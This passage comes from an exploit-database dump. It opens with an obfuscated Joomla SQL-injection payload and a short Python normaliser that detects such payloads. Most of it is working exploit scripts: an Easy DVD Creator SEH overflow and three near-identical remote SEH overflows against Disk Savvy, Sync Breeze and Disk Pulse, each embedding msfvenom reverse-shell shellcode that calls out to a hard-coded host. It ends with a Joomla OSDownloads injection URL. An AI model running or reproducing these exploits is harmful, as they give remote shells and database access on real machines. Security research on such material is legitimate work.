# 86+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
#
# Etc..
# # # # #
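
All three Joomla! PoCs above (Price Alert, Bargain Product VM3 and Sponsor Wall) carry the same MySQL error-based technique under keyword case-mangling, `/*!NNNNN ... */` version comments and hex-encoded string literals: a `floor(rand(0)*...)` expression is grouped by a key that embeds `database()` or `version()`, which forces a duplicate-key error whose message echoes the value. Before writing a detection rule or reproducing the issue you want the query in the clear. The normaliser below is an added example, not part of the advisories; it uses the Sponsor Wall and Bargain Product payloads exactly as they appear above as sample input, and the `looks_like_error_based_mysql` heuristic is this example's own, deliberately narrow signature.

```python
"""Strip the obfuscation from the MySQL error-based payloads above (added example, not the advisories' code)."""
import re
from urllib.parse import unquote_plus

VERSION_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)   # /*!11100sELeCT*/  ->  sELeCT (MySQL executes it)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)               # /* ... */          ->  dropped
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]+)\b")            # 0x7e               ->  '~'

# Payloads copied from the Sponsor Wall and Bargain Product PoCs above (query-string form, '+' is a space)
SPONSOR_WALL_PAYLOAD = (
    "86+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/"
    "((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))"
    "+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x"
    "+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1"
)
BARGAIN_PAYLOAD = (
    "17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,"
    "VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31"
)


def decode_hex_literal(m: "re.Match") -> str:
    """Render an even-length, printable-ASCII hex literal as a quoted string; leave anything else untouched."""
    digits = m.group(1)
    if len(digits) % 2:
        return m.group(0)
    raw = bytes.fromhex(digits)
    if all(0x20 <= b < 0x7F for b in raw):
        return "'" + raw.decode("ascii").replace("'", "''") + "'"
    return m.group(0)


def lowercase_outside_quotes(sql: str) -> str:
    """Lower-case keywords and identifiers but keep the decoded string literals as they are."""
    return re.sub(r"'[^']*'|[^']+",
                  lambda m: m.group(0) if m.group(0).startswith("'") else m.group(0).lower(),
                  sql)


def normalize_payload(raw: str) -> str:
    """URL-decode, unwrap version comments, decode hex literals, lower-case, collapse whitespace."""
    sql = unquote_plus(raw)
    sql = VERSION_COMMENT.sub(r"\1", sql)
    sql = PLAIN_COMMENT.sub(" ", sql)
    sql = HEX_LITERAL.sub(decode_hex_literal, sql)
    sql = lowercase_outside_quotes(sql)
    return re.sub(r"\s+", " ", sql).strip()


def looks_like_error_based_mysql(normalized_sql: str) -> bool:
    """Narrow signature for the rand(0)/group by duplicate-key trick; run it on normalised input only."""
    return "floor(rand(0)*" in normalized_sql and "group by" in normalized_sql


if __name__ == "__main__":
    for name, payload in (("sponsor wall", SPONSOR_WALL_PAYLOAD), ("bargain product", BARGAIN_PAYLOAD)):
        clear = normalize_payload(payload)
        print(name, "->", clear)
        print("  error-based MySQL:", looks_like_error_based_mysql(clear))
```

One caveat on the hex decoding: MySQL treats a hex literal as a string in string context but as an integer in numeric context, so the `0x32` inside `floor(rand(0)*0x32)` in the Bargain Product payload is really 50; the normaliser prints the string reading `'2'`, which is the right view for `concat_ws` arguments but not for arithmetic. Run the signature on normalised text, never on the raw query string, since the raw form hides `group by` behind `/*!00005Group*/+BY`.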
            
#!/usr/bin/python

###############################################################################
# Exploit Title:        Easy DVD Creator 2.5.11 - Buffer Overflow (Windows 10 64bit, SEH)
# Date:                 26-08-2017
# Exploit Author:       tr0ubl3m4k3r
# Vulnerable Software:  Easy DVD Creator
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              2.5.11
# Software Link:        http://www.divxtodvd.net/easy_dvd_creator.exe
# Tested On:            Windows 10 64bit
#
# Credit to Muhann4d for discovering the PoC (41911).
#
# To reproduce the exploit:
#	1. Click Register
#	2. In the "Enter User Name" field, paste the content of exploit.txt
#
##############################################################################


buffer = "\x41" * 988
nSEH = "\xeb\x09\x90\x90"

# 0x10037859 : pop ebx # pop eax # ret  | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] 
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files (x86)\Easy MOV Converter\SkinMagic.dll)

SEH = "\x59\x78\x03\x10"
junk = "\x90"*16

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.105 LPORT=443
# -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

shellcode = ("\xdb\xd5\xbf\xd7\xf8\x35\x95\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x83\xc2\x04\x31\x7a\x13\x03\xad\xeb\xd7\x60\xad\xe4\x9a"
"\x8b\x4d\xf5\xfa\x02\xa8\xc4\x3a\x70\xb9\x77\x8b\xf2\xef\x7b"
"\x60\x56\x1b\x0f\x04\x7f\x2c\xb8\xa3\x59\x03\x39\x9f\x9a\x02"
"\xb9\xe2\xce\xe4\x80\x2c\x03\xe5\xc5\x51\xee\xb7\x9e\x1e\x5d"
"\x27\xaa\x6b\x5e\xcc\xe0\x7a\xe6\x31\xb0\x7d\xc7\xe4\xca\x27"
"\xc7\x07\x1e\x5c\x4e\x1f\x43\x59\x18\x94\xb7\x15\x9b\x7c\x86"
"\xd6\x30\x41\x26\x25\x48\x86\x81\xd6\x3f\xfe\xf1\x6b\x38\xc5"
"\x88\xb7\xcd\xdd\x2b\x33\x75\x39\xcd\x90\xe0\xca\xc1\x5d\x66"
"\x94\xc5\x60\xab\xaf\xf2\xe9\x4a\x7f\x73\xa9\x68\x5b\xdf\x69"
"\x10\xfa\x85\xdc\x2d\x1c\x66\x80\x8b\x57\x8b\xd5\xa1\x3a\xc4"
"\x1a\x88\xc4\x14\x35\x9b\xb7\x26\x9a\x37\x5f\x0b\x53\x9e\x98"
"\x6c\x4e\x66\x36\x93\x71\x97\x1f\x50\x25\xc7\x37\x71\x46\x8c"
"\xc7\x7e\x93\x03\x97\xd0\x4c\xe4\x47\x91\x3c\x8c\x8d\x1e\x62"
"\xac\xae\xf4\x0b\x47\x55\x9f\xf3\x30\x57\x36\x9c\x42\x57\xc9"
"\xe7\xca\xb1\xa3\x07\x9b\x6a\x5c\xb1\x86\xe0\xfd\x3e\x1d\x8d"
"\x3e\xb4\x92\x72\xf0\x3d\xde\x60\x65\xce\x95\xda\x20\xd1\x03"
"\x72\xae\x40\xc8\x82\xb9\x78\x47\xd5\xee\x4f\x9e\xb3\x02\xe9"
"\x08\xa1\xde\x6f\x72\x61\x05\x4c\x7d\x68\xc8\xe8\x59\x7a\x14"
"\xf0\xe5\x2e\xc8\xa7\xb3\x98\xae\x11\x72\x72\x79\xcd\xdc\x12"
"\xfc\x3d\xdf\x64\x01\x68\xa9\x88\xb0\xc5\xec\xb7\x7d\x82\xf8"
"\xc0\x63\x32\x06\x1b\x20\x42\x4d\x01\x01\xcb\x08\xd0\x13\x96"
"\xaa\x0f\x57\xaf\x28\xa5\x28\x54\x30\xcc\x2d\x10\xf6\x3d\x5c"
"\x09\x93\x41\xf3\x2a\xb6")
padding = "\x44"*(1000-351)
f = open ("exploit.txt", "w")
f.write(buffer + nSEH + SEH + junk + shellcode + padding)
f.close()

            
#!/usr/bin/env python
# Exploit Title: Disk Savvy Enterprise 9.9.14 Remote SEH Buffer Overflow
# Date: 2017-08-25
# Exploit Author: Nipun Jaswal & Anurag Srivastava
# Author Homepage: www.pyramidcyber.com
# Vendor Homepage: http://www.disksavvy.com
# Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v9.9.14.exe
# Version: v9.9.14
# Tested on: Windows 7 SP1 x64
# Steps to Reproduce : Go to Options --> Server --> Check Enable Web Server on Port, Enter Any Port[8080] --> Save 
import socket,sys
target = "127.0.0.1"
port = 8080

#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
buf =  ""
buf += "\x89\xe3\xda\xde\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x6d"
buf += "\x52\x35\x50\x37\x70\x65\x50\x71\x70\x6b\x39\x4d\x35"
buf += "\x70\x31\x4b\x70\x63\x54\x6c\x4b\x56\x30\x76\x50\x4c"
buf += "\x4b\x63\x62\x76\x6c\x4c\x4b\x50\x52\x76\x74\x4c\x4b"
buf += "\x42\x52\x36\x48\x34\x4f\x58\x37\x51\x5a\x37\x56\x46"
buf += "\x51\x79\x6f\x6e\x4c\x55\x6c\x31\x71\x51\x6c\x67\x72"
buf += "\x34\x6c\x51\x30\x59\x51\x48\x4f\x36\x6d\x65\x51\x79"
buf += "\x57\x59\x72\x6b\x42\x72\x72\x72\x77\x4c\x4b\x52\x72"
buf += "\x76\x70\x6c\x4b\x61\x5a\x77\x4c\x6e\x6b\x42\x6c\x66"
buf += "\x71\x50\x78\x6a\x43\x32\x68\x75\x51\x6b\x61\x36\x31"
buf += "\x4e\x6b\x70\x59\x47\x50\x75\x51\x7a\x73\x4c\x4b\x30"
buf += "\x49\x66\x78\x79\x73\x64\x7a\x73\x79\x6c\x4b\x45\x64"
buf += "\x4c\x4b\x36\x61\x7a\x76\x50\x31\x6b\x4f\x4e\x4c\x4f"
buf += "\x31\x7a\x6f\x36\x6d\x43\x31\x39\x57\x74\x78\x6b\x50"
buf += "\x31\x65\x6b\x46\x43\x33\x53\x4d\x68\x78\x77\x4b\x33"
buf += "\x4d\x31\x34\x44\x35\x78\x64\x56\x38\x6e\x6b\x36\x38"
buf += "\x75\x74\x56\x61\x78\x53\x65\x36\x4e\x6b\x66\x6c\x30"
buf += "\x4b\x6e\x6b\x33\x68\x65\x4c\x63\x31\x68\x53\x6c\x4b"
buf += "\x65\x54\x4e\x6b\x33\x31\x58\x50\x6e\x69\x43\x74\x31"
buf += "\x34\x65\x74\x53\x6b\x71\x4b\x71\x71\x46\x39\x72\x7a"
buf += "\x53\x61\x39\x6f\x49\x70\x43\x6f\x61\x4f\x61\x4a\x4e"
buf += "\x6b\x44\x52\x78\x6b\x6e\x6d\x33\x6d\x33\x58\x75\x63"
buf += "\x50\x32\x35\x50\x37\x70\x32\x48\x54\x37\x70\x73\x34"
buf += "\x72\x63\x6f\x66\x34\x62\x48\x52\x6c\x52\x57\x44\x66"
buf += "\x43\x37\x39\x6f\x79\x45\x4c\x78\x4e\x70\x43\x31\x45"
buf += "\x50\x57\x70\x34\x69\x6f\x34\x51\x44\x70\x50\x53\x58"
buf += "\x76\x49\x6f\x70\x50\x6b\x33\x30\x79\x6f\x5a\x75\x50"
buf += "\x50\x46\x30\x42\x70\x46\x30\x51\x50\x62\x70\x67\x30"
buf += "\x70\x50\x30\x68\x79\x7a\x56\x6f\x69\x4f\x49\x70\x69"
buf += "\x6f\x48\x55\x6f\x67\x52\x4a\x36\x65\x75\x38\x68\x39"
buf += "\x33\x6c\x6b\x6f\x74\x38\x52\x48\x43\x32\x57\x70\x44"
buf += "\x51\x71\x4b\x4c\x49\x4b\x56\x31\x7a\x72\x30\x56\x36"
buf += "\x50\x57\x63\x58\x6d\x49\x6d\x75\x34\x34\x63\x51\x79"
buf += "\x6f\x4b\x65\x6c\x45\x6b\x70\x43\x44\x36\x6c\x69\x6f"
buf += "\x72\x6e\x76\x68\x52\x55\x48\x6c\x52\x48\x78\x70\x6c"
buf += "\x75\x6f\x52\x52\x76\x4b\x4f\x4e\x35\x42\x48\x43\x53"
buf += "\x50\x6d\x35\x34\x63\x30\x6e\x69\x4d\x33\x62\x77\x43"
buf += "\x67\x56\x37\x75\x61\x39\x66\x42\x4a\x62\x32\x31\x49"
buf += "\x70\x56\x69\x72\x39\x6d\x72\x46\x59\x57\x51\x54\x45"
buf += "\x74\x77\x4c\x33\x31\x46\x61\x4e\x6d\x37\x34\x57\x54"
buf += "\x56\x70\x68\x46\x47\x70\x62\x64\x36\x34\x46\x30\x61"
buf += "\x46\x36\x36\x62\x76\x70\x46\x72\x76\x32\x6e\x61\x46"
buf += "\x30\x56\x56\x33\x70\x56\x73\x58\x53\x49\x48\x4c\x55"
buf += "\x6f\x4f\x76\x49\x6f\x4a\x75\x4f\x79\x39\x70\x52\x6e"
buf += "\x72\x76\x37\x36\x4b\x4f\x56\x50\x61\x78\x65\x58\x4e"
buf += "\x67\x57\x6d\x75\x30\x39\x6f\x59\x45\x6f\x4b\x78\x70"
buf += "\x4d\x65\x4e\x42\x71\x46\x71\x78\x6e\x46\x6c\x55\x4f"
buf += "\x4d\x6f\x6d\x79\x6f\x59\x45\x35\x6c\x53\x36\x53\x4c"
buf += "\x54\x4a\x4d\x50\x6b\x4b\x4b\x50\x54\x35\x65\x55\x6d"
buf += "\x6b\x63\x77\x55\x43\x43\x42\x32\x4f\x63\x5a\x43\x30"
buf += "\x72\x73\x4b\x4f\x48\x55\x41\x41"


payload = buf # Shellcode begins from the start of the buffer
payload += 'A' * (2492   - len(payload)) # Padding after shellcode till the offset value
payload += '\xEB\x10\x90\x90' # NSEH, a short jump of 10 bytes
payload += '\xDD\xAD\x13\x10' # SEH : POP EDI POP ESI RET 04  libpal.dll
payload += '\x90' * 10 # NOPsled
payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode 
payload += 'D' * (5000-len(payload)) # Additional Padding

s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,port))
    print "[*] Connection Success."
except socket.error:
    print "Connection refused %s:%s" %(target,port)
    sys.exit(2)
    
packet =  "GET /../%s HTTP/1.1\r\n" %payload # Request & Headers
packet += "Host: 4.2.2.2\r\n"
packet += "Connection: keep-alive\r\n"
packet += "Referer: http://pyramidcyber.com\r\n"
packet += "\r\n"
s.send(packet)
s.close()

            
#!/usr/bin/env python
# Exploit Title: Sync Breeze Enterprise v9.9.16 Remote SEH Buffer Overflow
# Date: 2017-08-25
# Exploit Author: Nipun Jaswal & Anurag Srivastava
# Author Homepage: www.pyramidcyber.com
# Vendor Homepage: http://www.syncbreeze.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.9.16.exe
# Version: v9.9.16
# Tested on: Windows 7 SP1 x64
# Steps to Reproduce : Go to Options --> Server --> Check Enable Web Server on Port, Enter Any Port[8080] --> Save 
import socket,sys
target = "127.0.0.1"
port = 8080

#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
buf =  ""
buf += "\x89\xe3\xda\xde\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x6d"
buf += "\x52\x35\x50\x37\x70\x65\x50\x71\x70\x6b\x39\x4d\x35"
buf += "\x70\x31\x4b\x70\x63\x54\x6c\x4b\x56\x30\x76\x50\x4c"
buf += "\x4b\x63\x62\x76\x6c\x4c\x4b\x50\x52\x76\x74\x4c\x4b"
buf += "\x42\x52\x36\x48\x34\x4f\x58\x37\x51\x5a\x37\x56\x46"
buf += "\x51\x79\x6f\x6e\x4c\x55\x6c\x31\x71\x51\x6c\x67\x72"
buf += "\x34\x6c\x51\x30\x59\x51\x48\x4f\x36\x6d\x65\x51\x79"
buf += "\x57\x59\x72\x6b\x42\x72\x72\x72\x77\x4c\x4b\x52\x72"
buf += "\x76\x70\x6c\x4b\x61\x5a\x77\x4c\x6e\x6b\x42\x6c\x66"
buf += "\x71\x50\x78\x6a\x43\x32\x68\x75\x51\x6b\x61\x36\x31"
buf += "\x4e\x6b\x70\x59\x47\x50\x75\x51\x7a\x73\x4c\x4b\x30"
buf += "\x49\x66\x78\x79\x73\x64\x7a\x73\x79\x6c\x4b\x45\x64"
buf += "\x4c\x4b\x36\x61\x7a\x76\x50\x31\x6b\x4f\x4e\x4c\x4f"
buf += "\x31\x7a\x6f\x36\x6d\x43\x31\x39\x57\x74\x78\x6b\x50"
buf += "\x31\x65\x6b\x46\x43\x33\x53\x4d\x68\x78\x77\x4b\x33"
buf += "\x4d\x31\x34\x44\x35\x78\x64\x56\x38\x6e\x6b\x36\x38"
buf += "\x75\x74\x56\x61\x78\x53\x65\x36\x4e\x6b\x66\x6c\x30"
buf += "\x4b\x6e\x6b\x33\x68\x65\x4c\x63\x31\x68\x53\x6c\x4b"
buf += "\x65\x54\x4e\x6b\x33\x31\x58\x50\x6e\x69\x43\x74\x31"
buf += "\x34\x65\x74\x53\x6b\x71\x4b\x71\x71\x46\x39\x72\x7a"
buf += "\x53\x61\x39\x6f\x49\x70\x43\x6f\x61\x4f\x61\x4a\x4e"
buf += "\x6b\x44\x52\x78\x6b\x6e\x6d\x33\x6d\x33\x58\x75\x63"
buf += "\x50\x32\x35\x50\x37\x70\x32\x48\x54\x37\x70\x73\x34"
buf += "\x72\x63\x6f\x66\x34\x62\x48\x52\x6c\x52\x57\x44\x66"
buf += "\x43\x37\x39\x6f\x79\x45\x4c\x78\x4e\x70\x43\x31\x45"
buf += "\x50\x57\x70\x34\x69\x6f\x34\x51\x44\x70\x50\x53\x58"
buf += "\x76\x49\x6f\x70\x50\x6b\x33\x30\x79\x6f\x5a\x75\x50"
buf += "\x50\x46\x30\x42\x70\x46\x30\x51\x50\x62\x70\x67\x30"
buf += "\x70\x50\x30\x68\x79\x7a\x56\x6f\x69\x4f\x49\x70\x69"
buf += "\x6f\x48\x55\x6f\x67\x52\x4a\x36\x65\x75\x38\x68\x39"
buf += "\x33\x6c\x6b\x6f\x74\x38\x52\x48\x43\x32\x57\x70\x44"
buf += "\x51\x71\x4b\x4c\x49\x4b\x56\x31\x7a\x72\x30\x56\x36"
buf += "\x50\x57\x63\x58\x6d\x49\x6d\x75\x34\x34\x63\x51\x79"
buf += "\x6f\x4b\x65\x6c\x45\x6b\x70\x43\x44\x36\x6c\x69\x6f"
buf += "\x72\x6e\x76\x68\x52\x55\x48\x6c\x52\x48\x78\x70\x6c"
buf += "\x75\x6f\x52\x52\x76\x4b\x4f\x4e\x35\x42\x48\x43\x53"
buf += "\x50\x6d\x35\x34\x63\x30\x6e\x69\x4d\x33\x62\x77\x43"
buf += "\x67\x56\x37\x75\x61\x39\x66\x42\x4a\x62\x32\x31\x49"
buf += "\x70\x56\x69\x72\x39\x6d\x72\x46\x59\x57\x51\x54\x45"
buf += "\x74\x77\x4c\x33\x31\x46\x61\x4e\x6d\x37\x34\x57\x54"
buf += "\x56\x70\x68\x46\x47\x70\x62\x64\x36\x34\x46\x30\x61"
buf += "\x46\x36\x36\x62\x76\x70\x46\x72\x76\x32\x6e\x61\x46"
buf += "\x30\x56\x56\x33\x70\x56\x73\x58\x53\x49\x48\x4c\x55"
buf += "\x6f\x4f\x76\x49\x6f\x4a\x75\x4f\x79\x39\x70\x52\x6e"
buf += "\x72\x76\x37\x36\x4b\x4f\x56\x50\x61\x78\x65\x58\x4e"
buf += "\x67\x57\x6d\x75\x30\x39\x6f\x59\x45\x6f\x4b\x78\x70"
buf += "\x4d\x65\x4e\x42\x71\x46\x71\x78\x6e\x46\x6c\x55\x4f"
buf += "\x4d\x6f\x6d\x79\x6f\x59\x45\x35\x6c\x53\x36\x53\x4c"
buf += "\x54\x4a\x4d\x50\x6b\x4b\x4b\x50\x54\x35\x65\x55\x6d"
buf += "\x6b\x63\x77\x55\x43\x43\x42\x32\x4f\x63\x5a\x43\x30"
buf += "\x72\x73\x4b\x4f\x48\x55\x41\x41"


payload = buf # Shellcode begins from the start of the buffer
payload += 'A' * (2492   - len(payload)) # Padding after shellcode till the offset value
payload += '\xEB\x10\x90\x90' # NSEH, a short jump of 10 bytes
payload += '\xDD\xAD\x13\x10' # SEH : POP EDI POP ESI RET 04  libpal.dll
payload += '\x90' * 10 # NOPsled
payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode 
payload += 'D' * (5000-len(payload)) # Additional Padding

s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,port))
    print "[*] Connection Success."
except socket.error:
    print "Connection refused %s:%s" %(target,port)
    sys.exit(2)
    
packet =  "GET /../%s HTTP/1.1\r\n" %payload # Request & Headers
packet += "Host: 4.2.2.2\r\n"
packet += "Connection: keep-alive\r\n"
packet += "Referer: http://pyramidcyber.com\r\n"
packet += "\r\n"
s.send(packet)
s.close()

            
#!/usr/bin/env python
# Exploit Title: Disk Pulse Enterprise 9.9.16 Remote SEH Buffer Overflow
# Date: 2017-08-25
# Exploit Author: Nipun Jaswal & Anurag Srivastava
# Author Homepage: www.pyramidcyber.com
# Vendor Homepage: http://www.diskpulse.com
# Software Link: http://www.diskpulse.com/setups/diskpulseent_setup_v9.9.16.exe
# Version: v9.9.16
# Tested on: Windows 7 SP1 x64
# Steps to Reproduce : Go to Options --> Server --> Check Enable Web Server on Port, Enter Any Port[8080] --> Save 
import socket,sys
target = "127.0.0.1"
port = 8080

#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
buf =  ""
buf += "\x89\xe3\xda\xde\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x6d"
buf += "\x52\x35\x50\x37\x70\x65\x50\x71\x70\x6b\x39\x4d\x35"
buf += "\x70\x31\x4b\x70\x63\x54\x6c\x4b\x56\x30\x76\x50\x4c"
buf += "\x4b\x63\x62\x76\x6c\x4c\x4b\x50\x52\x76\x74\x4c\x4b"
buf += "\x42\x52\x36\x48\x34\x4f\x58\x37\x51\x5a\x37\x56\x46"
buf += "\x51\x79\x6f\x6e\x4c\x55\x6c\x31\x71\x51\x6c\x67\x72"
buf += "\x34\x6c\x51\x30\x59\x51\x48\x4f\x36\x6d\x65\x51\x79"
buf += "\x57\x59\x72\x6b\x42\x72\x72\x72\x77\x4c\x4b\x52\x72"
buf += "\x76\x70\x6c\x4b\x61\x5a\x77\x4c\x6e\x6b\x42\x6c\x66"
buf += "\x71\x50\x78\x6a\x43\x32\x68\x75\x51\x6b\x61\x36\x31"
buf += "\x4e\x6b\x70\x59\x47\x50\x75\x51\x7a\x73\x4c\x4b\x30"
buf += "\x49\x66\x78\x79\x73\x64\x7a\x73\x79\x6c\x4b\x45\x64"
buf += "\x4c\x4b\x36\x61\x7a\x76\x50\x31\x6b\x4f\x4e\x4c\x4f"
buf += "\x31\x7a\x6f\x36\x6d\x43\x31\x39\x57\x74\x78\x6b\x50"
buf += "\x31\x65\x6b\x46\x43\x33\x53\x4d\x68\x78\x77\x4b\x33"
buf += "\x4d\x31\x34\x44\x35\x78\x64\x56\x38\x6e\x6b\x36\x38"
buf += "\x75\x74\x56\x61\x78\x53\x65\x36\x4e\x6b\x66\x6c\x30"
buf += "\x4b\x6e\x6b\x33\x68\x65\x4c\x63\x31\x68\x53\x6c\x4b"
buf += "\x65\x54\x4e\x6b\x33\x31\x58\x50\x6e\x69\x43\x74\x31"
buf += "\x34\x65\x74\x53\x6b\x71\x4b\x71\x71\x46\x39\x72\x7a"
buf += "\x53\x61\x39\x6f\x49\x70\x43\x6f\x61\x4f\x61\x4a\x4e"
buf += "\x6b\x44\x52\x78\x6b\x6e\x6d\x33\x6d\x33\x58\x75\x63"
buf += "\x50\x32\x35\x50\x37\x70\x32\x48\x54\x37\x70\x73\x34"
buf += "\x72\x63\x6f\x66\x34\x62\x48\x52\x6c\x52\x57\x44\x66"
buf += "\x43\x37\x39\x6f\x79\x45\x4c\x78\x4e\x70\x43\x31\x45"
buf += "\x50\x57\x70\x34\x69\x6f\x34\x51\x44\x70\x50\x53\x58"
buf += "\x76\x49\x6f\x70\x50\x6b\x33\x30\x79\x6f\x5a\x75\x50"
buf += "\x50\x46\x30\x42\x70\x46\x30\x51\x50\x62\x70\x67\x30"
buf += "\x70\x50\x30\x68\x79\x7a\x56\x6f\x69\x4f\x49\x70\x69"
buf += "\x6f\x48\x55\x6f\x67\x52\x4a\x36\x65\x75\x38\x68\x39"
buf += "\x33\x6c\x6b\x6f\x74\x38\x52\x48\x43\x32\x57\x70\x44"
buf += "\x51\x71\x4b\x4c\x49\x4b\x56\x31\x7a\x72\x30\x56\x36"
buf += "\x50\x57\x63\x58\x6d\x49\x6d\x75\x34\x34\x63\x51\x79"
buf += "\x6f\x4b\x65\x6c\x45\x6b\x70\x43\x44\x36\x6c\x69\x6f"
buf += "\x72\x6e\x76\x68\x52\x55\x48\x6c\x52\x48\x78\x70\x6c"
buf += "\x75\x6f\x52\x52\x76\x4b\x4f\x4e\x35\x42\x48\x43\x53"
buf += "\x50\x6d\x35\x34\x63\x30\x6e\x69\x4d\x33\x62\x77\x43"
buf += "\x67\x56\x37\x75\x61\x39\x66\x42\x4a\x62\x32\x31\x49"
buf += "\x70\x56\x69\x72\x39\x6d\x72\x46\x59\x57\x51\x54\x45"
buf += "\x74\x77\x4c\x33\x31\x46\x61\x4e\x6d\x37\x34\x57\x54"
buf += "\x56\x70\x68\x46\x47\x70\x62\x64\x36\x34\x46\x30\x61"
buf += "\x46\x36\x36\x62\x76\x70\x46\x72\x76\x32\x6e\x61\x46"
buf += "\x30\x56\x56\x33\x70\x56\x73\x58\x53\x49\x48\x4c\x55"
buf += "\x6f\x4f\x76\x49\x6f\x4a\x75\x4f\x79\x39\x70\x52\x6e"
buf += "\x72\x76\x37\x36\x4b\x4f\x56\x50\x61\x78\x65\x58\x4e"
buf += "\x67\x57\x6d\x75\x30\x39\x6f\x59\x45\x6f\x4b\x78\x70"
buf += "\x4d\x65\x4e\x42\x71\x46\x71\x78\x6e\x46\x6c\x55\x4f"
buf += "\x4d\x6f\x6d\x79\x6f\x59\x45\x35\x6c\x53\x36\x53\x4c"
buf += "\x54\x4a\x4d\x50\x6b\x4b\x4b\x50\x54\x35\x65\x55\x6d"
buf += "\x6b\x63\x77\x55\x43\x43\x42\x32\x4f\x63\x5a\x43\x30"
buf += "\x72\x73\x4b\x4f\x48\x55\x41\x41"


payload = buf # Shellcode begins from the start of the buffer
payload += 'A' * (2492   - len(payload)) # Padding after shellcode till the offset value
payload += '\xEB\x10\x90\x90' # NSEH, a short jump of 10 bytes
payload += '\xDD\xAD\x13\x10' # SEH : POP EDI POP ESI RET 04  libpal.dll
payload += '\x90' * 10 # NOPsled
payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode 
payload += 'D' * (5000-len(payload)) # Additional Padding

s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,port))
    print "[*] Connection Success."
except:
    print "Connection Refused %s:%s" %(target,port)
    sys.exit(2)
    
packet =  "GET /../%s HTTP/1.1\r\n" %payload # Request & Headers
packet += "Host: 4.2.2.2\r\n"
packet += "Connection: keep-alive\r\n"
packet += "Referer: http://pyramidcyber.com\r\n"
packet += "\r\n"
s.send(packet)
s.close()

            
# # # # # 
# Exploit Title: Joomla! Component OSDownloads 1.7.4 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://joomlashack.com/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/downloads/osdownloads/
# Demo: https://demoextensions.joomlashack.com/osdownloads
# Version: 1.7.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?option=com_osdownloads&view=item&id=[SQL]
#
